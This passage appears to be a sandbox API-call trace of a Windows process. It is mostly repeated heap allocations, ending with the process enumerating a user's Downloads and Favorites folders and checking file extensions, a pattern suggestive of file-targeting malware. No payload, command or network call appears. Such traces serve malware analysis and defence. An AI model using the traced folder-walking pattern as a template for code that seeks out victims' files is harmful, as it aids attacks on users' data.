dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0232.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0232.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0232.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0232.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.146] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0232.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0232.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0232.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0232.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0232.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.148] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.149] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.150] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0232.150] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.150] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.150] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.150] PathFindFileNameW (pszPath="") returned="" [0232.150] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0232.150] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.150] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.150] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0232.151] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned=".ini" [0232.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0232.151] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0232.151] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0232.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0232.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0232.151] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.151] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.151] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0232.151] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.151] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.151] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.151] PathFindFileNameW (pszPath="") returned="" [0232.152] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, 